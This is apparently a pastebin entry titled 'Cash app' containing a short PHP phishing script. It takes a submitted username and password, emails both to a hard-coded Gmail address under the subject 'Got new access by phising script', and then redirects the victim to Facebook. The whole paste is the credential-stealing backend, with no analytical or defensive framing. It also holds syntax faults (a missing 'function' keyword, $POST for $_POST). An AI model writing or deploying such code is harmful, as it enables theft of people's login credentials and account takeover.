Cash app
3 years ago in Plain Text
<?php
mail_sender(){
$username = $POST[username];
$password = $POST[password];
$reciever = "AMIECOLE06@GMAIL.COM";
$subject = "Got new access by phising script";
$message = "The username is ". $username;
$message .= "and password is ". $password;
return mail($reciever, $subject, $message);
}
if(mail_sender()){
header("Location: http://www.facebook.com");
}
?>